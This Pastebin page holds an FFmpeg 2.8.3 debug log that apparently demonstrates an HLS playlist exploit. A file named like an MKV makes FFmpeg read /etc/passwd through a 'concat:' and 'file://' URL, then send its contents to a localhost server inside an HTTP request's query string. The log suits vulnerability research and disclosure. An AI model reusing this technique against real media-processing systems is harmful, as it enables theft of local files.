Advertisement
Guest User

Untitled

a guest
Jan 13th, 2016
521
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.34 KB | None | 0 0
  1. ffmpeg version 2.8.3 Copyright (c) 2000-2015 the FFmpeg developers
  2. built with gcc 4.8 (Ubuntu 4.8.4-2ubuntu1~14.04)
  3. configuration: --prefix=/opt/ffmpeg --libdir=/opt/ffmpeg/lib/ --enable-shared --enable-avresample --disable-stripping --enable-gpl --enable-version3 --enable-nonfree --enable-runtime-cpudetect --build-suffix=.ffmpeg --enable-postproc --
  4. libavutil 54. 31.100 / 54. 31.100
  5. libavcodec 56. 60.100 / 56. 60.100
  6. libavformat 56. 40.101 / 56. 40.101
  7. libavdevice 56. 4.100 / 56. 4.100
  8. libavfilter 5. 40.101 / 5. 40.101
  9. libavresample 2. 1. 0 / 2. 1. 0
  10. libswscale 3. 1.101 / 3. 1.101
  11. libswresample 1. 2.101 / 1. 2.101
  12. libpostproc 53. 3.100 / 53. 3.100
  13. Splitting the commandline.
  14. Reading option '-v' ... matched as option 'v' (set logging level) with argument 'debug'.
  15. Reading option '-i' ... matched as input file with argument 'test.mkv'.
  16. Reading option 'out.avi' ... matched as output file.
  17. Reading option '-y' ... matched as option 'y' (overwrite output files) with argument '1'.
  18. Finished splitting the commandline.
  19. Parsing a group of options: global .
  20. Applying option v (set logging level) with argument debug.
  21. Applying option y (overwrite output files) with argument 1.
  22. Successfully parsed a group of options.
  23. Parsing a group of options: input file test.mkv.
  24. Successfully parsed a group of options.
  25. Opening an input file: test.mkv.
  26. [hls,applehttp @ 0x17eec20] Format hls,applehttp probed with size=2048 and score=100
  27. [hls,applehttp @ 0x17eec20] HLS request for url 'concat:./header.m3u8|file:///etc/passwd', offset 0, playlist 0
  28. Format hls,applehttp probed with size=2048 and score=100
  29. [AVIOContext @ 0x17f5860] Statistics: 2371 bytes read, 0 seeks
  30. [hls,applehttp @ 0x17f1a40] HLS request for url 'http://localhost/remote.m3u8?root:x:0:0:root:/root:/bin/bash', offset 0, playlist 0
  31. [http @ 0x17f5860] request: GET /remote.m3u8?root:x:0:0:root:/root:/bin/bash HTTP/1.1
  32. User-Agent: Lavf/56.40.101
  33. Accept: */*
  34. Connection: close
  35. Host: localhost
  36. Icy-MetaData: 1
  37.  
  38.  
  39. [AVIOContext @ 0x17f5860] Statistics: 2371 bytes read, 0 seeks
  40. [AVIOContext @ 0x17f5980] Statistics: 2371 bytes read, 0 seeks
  41. [AVIOContext @ 0x17f5860] Statistics: 2371 bytes read, 0 seeks
  42. [AVIOContext @ 0x17f5a60] Statistics: 2371 bytes read, 0 seeks
  43. [AVIOContext @ 0x17f29e0] Statistics: 2371 bytes read, 0 seeks
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement